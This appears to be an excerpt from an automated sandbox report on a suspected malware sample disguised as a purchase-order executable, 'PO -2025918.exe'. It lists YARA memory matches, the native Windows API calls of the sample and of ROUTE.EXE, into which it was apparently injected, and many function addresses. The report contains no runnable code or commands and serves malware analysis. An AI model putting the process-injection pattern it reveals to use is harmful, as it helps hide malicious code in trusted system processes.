                      Source: Yara matchFile source: 00000009.00000002.3539706427.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2124637174.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.3540022925.0000000002D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.3539953830.0000000002D40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3543046045.0000000005840000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2126495744.0000000002050000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.3540990423.0000000002980000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_0042C9C3 NtClose,4_2_0042C9C3
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_0040AD20 NtAllocateVirtualMemory,4_2_0040AD20
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD2B60 NtClose,LdrInitializeThunk,4_2_01BD2B60
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD2DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_01BD2DF0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD2C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_01BD2C70
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD35C0 NtCreateMutant,LdrInitializeThunk,4_2_01BD35C0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD4340 NtSetContextThread,4_2_01BD4340
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD4650 NtSuspendThread,4_2_01BD4650
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD2BA0 NtEnumerateValueKey,4_2_01BD2BA0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD2B80 NtQueryInformationFile,4_2_01BD2B80
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD2BF0 NtAllocateVirtualMemory,4_2_01BD2BF0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD2BE0 NtQueryValueKey,4_2_01BD2BE0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD2AB0 NtWaitForSingleObject,4_2_01BD2AB0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD2AF0 NtWriteFile,4_2_01BD2AF0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD2AD0 NtReadFile,4_2_01BD2AD0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD2DB0 NtEnumerateKey,4_2_01BD2DB0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD2DD0 NtDelayExecution,4_2_01BD2DD0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD2D30 NtUnmapViewOfSection,4_2_01BD2D30
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD2D10 NtMapViewOfSection,4_2_01BD2D10
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD2D00 NtSetInformationFile,4_2_01BD2D00
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD2CA0 NtQueryInformationToken,4_2_01BD2CA0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD2CF0 NtOpenProcess,4_2_01BD2CF0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD2CC0 NtQueryVirtualMemory,4_2_01BD2CC0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD2C00 NtQueryInformationProcess,4_2_01BD2C00
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD2C60 NtCreateKey,4_2_01BD2C60
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD2FB0 NtResumeThread,4_2_01BD2FB0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD2FA0 NtQuerySection,4_2_01BD2FA0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD2F90 NtProtectVirtualMemory,4_2_01BD2F90
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD2FE0 NtCreateFile,4_2_01BD2FE0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD2F30 NtCreateSection,4_2_01BD2F30
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD2F60 NtCreateProcessEx,4_2_01BD2F60
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD2EA0 NtAdjustPrivilegesToken,4_2_01BD2EA0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD2E80 NtReadVirtualMemory,4_2_01BD2E80
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD2EE0 NtQueueApcThread,4_2_01BD2EE0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD2E30 NtWriteVirtualMemory,4_2_01BD2E30
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD3090 NtSetValueKey,4_2_01BD3090
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD3010 NtOpenDirectoryObject,4_2_01BD3010
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD39B0 NtGetContextThread,4_2_01BD39B0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD3D10 NtOpenProcessToken,4_2_01BD3D10
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD3D70 NtOpenThread,4_2_01BD3D70
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03304340 NtSetContextThread,LdrInitializeThunk,9_2_03304340
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03304650 NtSuspendThread,LdrInitializeThunk,9_2_03304650
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03302B60 NtClose,LdrInitializeThunk,9_2_03302B60
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03302BA0 NtEnumerateValueKey,LdrInitializeThunk,9_2_03302BA0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03302BF0 NtAllocateVirtualMemory,LdrInitializeThunk,9_2_03302BF0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03302BE0 NtQueryValueKey,LdrInitializeThunk,9_2_03302BE0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03302AF0 NtWriteFile,LdrInitializeThunk,9_2_03302AF0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03302AD0 NtReadFile,LdrInitializeThunk,9_2_03302AD0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03302F30 NtCreateSection,LdrInitializeThunk,9_2_03302F30
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03302FB0 NtResumeThread,LdrInitializeThunk,9_2_03302FB0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03302FE0 NtCreateFile,LdrInitializeThunk,9_2_03302FE0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03302E80 NtReadVirtualMemory,LdrInitializeThunk,9_2_03302E80
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03302EE0 NtQueueApcThread,LdrInitializeThunk,9_2_03302EE0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03302D30 NtUnmapViewOfSection,LdrInitializeThunk,9_2_03302D30
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03302D10 NtMapViewOfSection,LdrInitializeThunk,9_2_03302D10
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03302DF0 NtQuerySystemInformation,LdrInitializeThunk,9_2_03302DF0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03302DD0 NtDelayExecution,LdrInitializeThunk,9_2_03302DD0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03302C70 NtFreeVirtualMemory,LdrInitializeThunk,9_2_03302C70
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03302C60 NtCreateKey,LdrInitializeThunk,9_2_03302C60
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03302CA0 NtQueryInformationToken,LdrInitializeThunk,9_2_03302CA0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_033035C0 NtCreateMutant,LdrInitializeThunk,9_2_033035C0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_033039B0 NtGetContextThread,LdrInitializeThunk,9_2_033039B0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03302B80 NtQueryInformationFile,9_2_03302B80
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03302AB0 NtWaitForSingleObject,9_2_03302AB0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03302F60 NtCreateProcessEx,9_2_03302F60
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03302FA0 NtQuerySection,9_2_03302FA0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03302F90 NtProtectVirtualMemory,9_2_03302F90
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03302E30 NtWriteVirtualMemory,9_2_03302E30
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03302EA0 NtAdjustPrivilegesToken,9_2_03302EA0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03302D00 NtSetInformationFile,9_2_03302D00
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03302DB0 NtEnumerateKey,9_2_03302DB0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03302C00 NtQueryInformationProcess,9_2_03302C00
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03302CF0 NtOpenProcess,9_2_03302CF0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03302CC0 NtQueryVirtualMemory,9_2_03302CC0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03303010 NtOpenDirectoryObject,9_2_03303010
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03303090 NtSetValueKey,9_2_03303090
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03303D10 NtOpenProcessToken,9_2_03303D10
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03303D70 NtOpenThread,9_2_03303D70
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_00AB91D0 NtCreateFile,9_2_00AB91D0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_00AB9340 NtReadFile,9_2_00AB9340
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_00AB94D0 NtClose,9_2_00AB94D0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_00AB9430 NtDeleteFile,9_2_00AB9430
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_00AB9640 NtAllocateVirtualMemory,9_2_00AB9640
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BE2F284_2_01BE2F28
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C5EEDB4_2_01C5EEDB
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BB2E904_2_01BB2E90
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C5CE934_2_01C5CE93
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA0E594_2_01BA0E59
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C5EE264_2_01C5EE26
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BAB1B04_2_01BAB1B0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C6B16B4_2_01C6B16B
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B8F1724_2_01B8F172
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD516C4_2_01BD516C
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C4F0CC4_2_01C4F0CC
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C5F0E04_2_01C5F0E0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C570E94_2_01C570E9
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA70C04_2_01BA70C0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BE739A4_2_01BE739A
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C5132D4_2_01C5132D
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B8D34C4_2_01B8D34C
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA52A04_2_01BA52A0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C412ED4_2_01C412ED
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BBD2F04_2_01BBD2F0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BBB2C04_2_01BBB2C0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C695C34_2_01C695C3
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C3D5B04_2_01C3D5B0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C575714_2_01C57571
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B914604_2_01B91460
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C5F43F4_2_01C5F43F
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C5F7B04_2_01C5F7B0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C516CC4_2_01C516CC
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BE56304_2_01BE5630
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C359104_2_01C35910
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA99504_2_01BA9950
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BBB9504_2_01BBB950
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA38E04_2_01BA38E0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C0D8004_2_01C0D800
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C15BF04_2_01C15BF0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BBFB804_2_01BBFB80
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BDDBF94_2_01BDDBF9
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C5FB764_2_01C5FB76
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C4DAC64_2_01C4DAC6
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BE5AA04_2_01BE5AA0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C41AA34_2_01C41AA3
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C3DAAC4_2_01C3DAAC
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C57A464_2_01C57A46
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C5FA494_2_01C5FA49
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C13A6C4_2_01C13A6C
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BBFDC04_2_01BBFDC0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C51D5A4_2_01C51D5A
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C57D734_2_01C57D73
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA3D404_2_01BA3D40
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C5FCF24_2_01C5FCF2
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C19C324_2_01C19C32
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA1F924_2_01BA1F92
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B63FD54_2_01B63FD5
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B63FD24_2_01B63FD2
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C5FFB14_2_01C5FFB1
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C5FF094_2_01C5FF09
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA9EB04_2_01BA9EB0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_0338A3529_2_0338A352
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032DE3F09_2_032DE3F0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_033903E69_2_033903E6
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_033702749_2_03370274
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_033502C09_2_033502C0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032C01009_2_032C0100
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_0336A1189_2_0336A118
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_033581589_2_03358158
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_033901AA9_2_033901AA
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_033841A29_2_033841A2
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_033881CC9_2_033881CC
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_033620009_2_03362000
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032D07709_2_032D0770
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032F47509_2_032F4750
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032CC7C09_2_032CC7C0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032EC6E09_2_032EC6E0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032D05359_2_032D0535
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_033905919_2_03390591
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_033744209_2_03374420
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_033824469_2_03382446
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_0337E4F69_2_0337E4F6
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_0338AB409_2_0338AB40
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03386BD79_2_03386BD7
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032CEA809_2_032CEA80
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032E69629_2_032E6962
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032D29A09_2_032D29A0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_0339A9A69_2_0339A9A6
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032D28409_2_032D2840
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032DA8409_2_032DA840
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032B68B89_2_032B68B8
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032FE8F09_2_032FE8F0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03372F309_2_03372F30
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03312F289_2_03312F28
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032F0F309_2_032F0F30
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03344F409_2_03344F40
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_0334EFA09_2_0334EFA0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032C2FC89_2_032C2FC8
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_0338EE269_2_0338EE26
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032D0E599_2_032D0E59
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_0338CE939_2_0338CE93
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032E2E909_2_032E2E90
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_0338EEDB9_2_0338EEDB
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_0336CD1F9_2_0336CD1F
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032DAD009_2_032DAD00
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032E8DBF9_2_032E8DBF
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032CADE09_2_032CADE0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032D0C009_2_032D0C00
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03370CB59_2_03370CB5
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032C0CF29_2_032C0CF2
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_0338132D9_2_0338132D
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032BD34C9_2_032BD34C
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_0331739A9_2_0331739A
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032D52A09_2_032D52A0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_033712ED9_2_033712ED
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032ED2F09_2_032ED2F0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032EB2C09_2_032EB2C0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_0339B16B9_2_0339B16B
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032BF1729_2_032BF172
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_0330516C9_2_0330516C
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032DB1B09_2_032DB1B0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_033870E99_2_033870E9
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_0338F0E09_2_0338F0E0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032D70C09_2_032D70C0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_0337F0CC9_2_0337F0CC
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_0338F7B09_2_0338F7B0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_033156309_2_03315630
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_033816CC9_2_033816CC
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_033875719_2_03387571
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_0336D5B09_2_0336D5B0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_033995C39_2_033995C3
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_0338F43F9_2_0338F43F
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032C14609_2_032C1460
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_0338FB769_2_0338FB76
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032EFB809_2_032EFB80
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03345BF09_2_03345BF0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_0330DBF99_2_0330DBF9
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03343A6C9_2_03343A6C
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_0338FA499_2_0338FA49
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03387A469_2_03387A46
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03315AA09_2_03315AA0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03371AA39_2_03371AA3
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_0336DAAC9_2_0336DAAC
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_0337DAC69_2_0337DAC6
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_033659109_2_03365910
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032D99509_2_032D9950
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032EB9509_2_032EB950
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_0333D8009_2_0333D800
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032D38E09_2_032D38E0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_0338FF099_2_0338FF09
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_0338FFB19_2_0338FFB1
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032D1F929_2_032D1F92
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03293FD29_2_03293FD2
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03293FD59_2_03293FD5
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032D9EB09_2_032D9EB0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03387D739_2_03387D73
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03381D5A9_2_03381D5A
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032D3D409_2_032D3D40
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032EFDC09_2_032EFDC0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03349C329_2_03349C32
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_0338FCF29_2_0338FCF2
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_00AA1D309_2_00AA1D30
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_00A9CBE79_2_00A9CBE7
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_00A9CBF09_2_00A9CBF0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_00A9ADF09_2_00A9ADF0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_00A9CE109_2_00A9CE10
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_00A9AF349_2_00A9AF34
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_00A9AF409_2_00A9AF40
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_00AA53D09_2_00AA53D0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_00AA35E09_2_00AA35E0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_00AA35DD9_2_00AA35DD
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_00ABBAD09_2_00ABBAD0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_031AE3339_2_031AE333
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_031AE2169_2_031AE216
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_031AD7989_2_031AD798
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_031AE6D59_2_031AE6D5
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_031ACA289_2_031ACA28
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: String function: 01C1F290 appears 102 times
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: String function: 01C0EA12 appears 86 times
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: String function: 01BD5130 appears 58 times
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: String function: 01B8B970 appears 262 times
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: String function: 01BE7E54 appears 106 times
